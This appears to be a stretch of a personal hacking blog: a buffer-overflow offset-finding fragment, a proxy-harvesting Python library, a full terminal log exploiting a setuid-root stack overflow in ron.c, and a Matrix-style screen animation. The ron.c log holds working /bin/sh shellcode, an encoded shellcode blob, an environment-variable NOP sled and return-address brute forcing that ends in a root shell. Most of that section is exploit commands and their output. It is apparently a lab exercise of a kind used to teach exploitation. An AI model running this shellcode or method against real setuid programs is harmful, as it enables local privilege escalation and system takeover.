"Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv" buff += "6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2F" buff += "x3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9" buff += "Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga" buff += "6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2G" buff += "c3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9" buff += "Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf" buff += "6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2G" buff += "h3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9" buff += "Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk" Output has been saved in StackFlowers.log gunslinger@c0debreaker:/media/disk/stackflowers$
and we load it into program that vulnerable stack overflow attack and attach it with debugger. and see what eip register overwritten by what.
i use immunity debugger in this case.
debugger tell us that register eip contains 0x356b4234 (that representation of 34 42 6b 35 = 4Bk5). now we locate where is 0x356b4234 location of the pattern exactly.
now we know that pattern start at 1094 bytes + 4 bytes to overwrite eip register.
ok that just an example of using the program, you can try it by your self. and you can read the source of the program, browse project here https://sourceforge.net/projects/stackflowers/files/ . in future day i’ll write win32 exploit development here. but in indonesian language, so keep in touch.
allright, take it easy.
PyProxy | Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library
This idea is taken after doing any research with some socket. and finally, i need some proxy for it’s research .
so i’m going to make something to parse proxy in every site and has a proxy checker ability
and i need to use / import that dinamically for the research, so i must play with the object too .
This article will introduce a python library has done by me
the name is PyProxy .
PyProxy is a Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library
This is can be use by direct or you can import this to your program
for direct use , you just need to execute this library . you will see the help module along with the library
by adding -h or –help in first argument
PyProxy v.09 by Gunslinger_ <yudha.gunslinger@gmail.com> - Proxy Hunter and Tester Opensource engine
A high-level cross-protocol proxy-hunter
Usage: pyproxy.py [options]
Options:
-h, --help show this help message and exit
-s, --samair just use samair.ru to hunt proxies
-l, --sitelist use all site in the list
-t, --test test all proxy !
-a, --all do all !
-v, --version print current proxy hunter version
-d, --debug debug program for more talkable & every proxy will be
print to screen
-o FILE, --outputfile=FILE
output proxy will be print
[default : proxylist.txt]
-i FILE, --inputfile=FILE
input proxy will be checked
[default : proxylist.txt]
-g FILE, --outputgood=FILE
output all good proxy will be saved
[default : goodproxy.txt]
-c NUMBER, --timeout=NUMBER
timeout connections being program run
[default : 30]
Example :
pyproxy.py -s | Gather proxy with samair.ru
pyproxy.py -l | Gather proxy in the url list
pyproxy.py -t proxylist.txt | Test proxy inside proxylist.txt
pyproxy.py -a | Do all
pyproxy.py -v | Print current version
for advance user / python programmer .
we can use it in PyShell too by import them inside
gunslinger@c0debreaker:~/python/lib$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyproxy
>>> help(pyproxy)
Help on module pyproxy:
NAME
pyproxy
FILE
/home/gunslinger/python/module/pyproxy/pyproxy.py
DESCRIPTION
# -*- coding: utf-8 -*-
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
#
# Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
# http://bit.ly/c0debreaker
CLASSES
__builtin__.object
proxyhunter
runengine
class proxyhunter(__builtin__.object)
| Instance variables:
|
| Outputproxy
| Output file every proxy will be printed in
| Default : proxylist.txt
|
| Goodproxy
| Output file all good proxy will be print
| Default : goodproxylist.txt
|
| Verbose
| More noise, every proxy will be print into screen
| Default : True
| Timeout
| Timeout every test proxy connections in socket
| Default : 30
|
| Sitelist
| Proxy site for parsing proxy
| Default : []
|
| Methods defined here:
|
| Cleanitup(self, sorted_output='uniqueproxylist.txt')
| proxy will be printed in uniqueproxylist.txt by default
|
| CoreFreshTester(self, proxy)
|
| LoadProxy(self)
|
| MainFreshTester(self, proxy)
|
| ParseProxy(self, site)
|
| Samairdotru(self)
|
| Single(self)
|
| TestProxy(self)
|
| __init__(self, OutputProxy='proxylist.txt', GoodProxy='goodproxylist.txt', Verbose=True, TimeOut=30, Sitelist=[])
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class runengine(__builtin__.object)
| Methods defined here:
|
| __init__(self)
|
| parseoption(self)
|
| printversion(self)
|
| run(self)
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
FUNCTIONS
main()
DATA
__author__ = 'Gunslinger_ <yudha.gunslinger@gmail.com>'
__copyright__ = 'Copyright (c) 2010 Gunslinger_'
__date__ = 'Thu Oct 7 00:00:41 2010'
__version__ = '09'
__warningregistry__ = {('the sets module is deprecated', <type 'except...
VERSION
09
DATE
Thu Oct 7 00:00:41 2010
AUTHOR
Gunslinger_ <yudha.gunslinger@gmail.com>
(END) q
Need parse proxy in any site ? simply like this
>>> ph = pyproxy.proxyhunter()
>>> ph.ParseProxy("http://aliveproxy.com/high-anonymity-proxy-list/")
[*] Parse proxy from aliveproxy.com/high-anonymity-proxy-list/
218.182.134.23:8080
210.158.6.201:8080
174.142.24.201:3128
217.23.137.56:80
174.142.104.57:3128
205.213.195.70:8080
174.142.24.203:3128
174.142.24.205:3128
24.155.96.93:0080
174.142.24.204:3128
[*] 10 Proxies receieved from : aliveproxy.com/high-anonymity-proxy-list/
This module can be use for proxy testing too
>>> import pyproxy >>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt") >>> ph.LoadProxy() [*] File successfully loaded... >>> ph.TestProxy() Error : <urlopen error [Errno 111] Connection refused> [*] 218.182.134.23:8080 '--------------> Bad Error : <urlopen error [Errno 111] Connection refused> [*] 210.158.6.201:8080 '--------------> Bad Date: Fri, 08 Oct 2010 12:56:21 GMT Server: gws Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 X-XSS-Protection: 1; mode=block Set-Cookie: PREF=ID=3b034e546cd351bf:TM=1286542581:LM=1286542581:S=EmivqSAOZBhj22iF; expires=Sun, 07-Oct-2012 12:56:21 GMT; path=/; domain=.google.ca Set-Cookie: NID=39=AQ2UnSEV0xbVMzzwrlcIhBN6dBszmQNIrHgh_iggOQh2JB8pBqz8bIrsxWQv-YX_6jaB3HlMJ7U1ghKURQyUM5evLmenr8vy9ByPZcVM-rkOGsf6nMNxxLQST1SkyJZK; expires=Sat, 09-Apr-2011 12:56:21 GMT; path=/; domain=.google.ca; HttpOnly Connection: close Transfer-Encoding: chunked ... [*] 174.142.24.201:3128 '--------------> Good [*] All Fresh proxy has been saved in goodproxylist.txt >>>
doesn’t need more noise ? take down the Verbose variable to False
>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt", Verbose=False) >>> ph.LoadProxy() [*] File successfully loaded... >>> ph.TestProxy() [*] 218.182.134.23:8080 '--------------> Good [*] 210.158.6.201:8080 '--------------> Good [*] 174.142.24.201:3128 '--------------> Good [*] 217.23.137.56:80 '--------------> Good [*] 174.142.104.57:3128 '--------------> Good [*] 205.213.195.70:8080 '--------------> Bad [*] 174.142.24.203:3128 '--------------> Good [*] 174.142.24.205:3128 '--------------> Good [*] 24.155.96.93:0080 '--------------> Bad [*] 174.142.24.204:3128 '--------------> Good [*] All Fresh proxy has been saved in goodproxylist.txt >>>
For more infomations, you can take a look at the source
you can find the project here https://sourceforge.net/projects/pyproxy/
hope can be useful for you ;)
play with ron.c
i found in internet about this source .
but exploitation trick is about oldstyle, so it’s useless .
so i’ve been challenged in .
play with ron.c
gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
/**
* Name: StackVuln.c
* Author: Ron Bowes
* Date: March 24, 2004
* To compile: gcc StackVuln.c -o StackVuln
* Requires: n/a
*
* Purpose: This code is vulnerable to a stack overflow if more than
* 20 characters are entered. The exploit for it was written by
* Jon Erickson in Hacking: Art of exploitation, but I wrote
* this vulnerable code independently.
*/
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char string[40];
strcpy(string, argv[1]);
printf("The message was: %s\n", string);
printf("Program completed normally!\n\n");
return 0;
}
gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger:
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!
gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking null on randomize_va_space [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x1d 29
edx 0xb7fc50d0 -1208201008
ebx 0xb7fc3ff4 -1208205324
esp 0xbffff4d0 0xbffff4d0
ebp 0x41414141 0x41414141
esi 0x8048480 134513792
edi 0x8048370 134513520
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) list
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
21 return 0;
22 }
23
(gdb) list 1
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is
Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) i r esp
esp 0xbffff488 0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password:
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py bof1 bof2.c bof.c bufferbruteforce.py displant.c easy.c get_env man-pages ron shellcode.bin smashme2 vanish.c
bf2.py bof1.c bof3 brute core easy2 expl get_env.c objdasm.vim ron.c shellcode.c smashme2.c
bof bof2 bof3.c brute.c displant easy2.c expl.c hts passwd.php shellcode3.bin smashme smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n" $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
(Missing operator before "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof#
matrix.py [matrix in python]
do you know matrix movie ?
here i make some code about matrix in python ..
here you go !
#!/usr/bin/python
# -*- coding: utf-8 -*-
# gunslinger_ 08 feb 2010
# this code is protected under the gpl
# get your copy at <http://www.gnu.org/licenses/>
import os, time, random, sys
class message(str):
def __new__(cls, text, speed):
self = super(message, cls).__new__(cls, text)
self.speed = speed
self.y = -1*len(text)
self.x = random.randint(0, display().width)
self.skip = 0
return self
def move(self):
if self.speed > self.skip:
self.skip += 1
else:
self.skip = 0
self.y += 1
class display(list):
def __init__(self):
self.height, self.width = [int(x) for x in os.popen('stty size', 'r').read().split()]
self[:] = [' ' for y in xrange(self.height) for x in xrange(self.width)]
def set_vertical(self, x, y, string):
string = string[::-1]
if x < 0:
x = 80 + x
if x >= self.width:
x = self.width-1
if y < 0:
string = string[abs(y):]
y = 0
if y + len(string) > self.height:
string = string[0:self.height - y]
if y >= self.height:
return
start = y*self.width+x
length = self.width*(y+len(string))
step = self.width
self[start:length:step] = string
def __str__(self):
return ''.join(self)
i_message = raw_input("Input a message: ")
messages = [message(i_message, random.randint(1, 5))]
for t in xrange(1000000):
messages.append(message(i_message[::-1], random.randint(1, 5)))
d = display()
for text in messages:
d.set_vertical(text.x, text.y, text)
text.move()
sys.stdout.write(str(d))
sys.stdout.flush()
del d
time.sleep(0.1)
for best view, you must install konsole in your system :
to get it just type : sudo apt-get install konsole
and here example
recent comment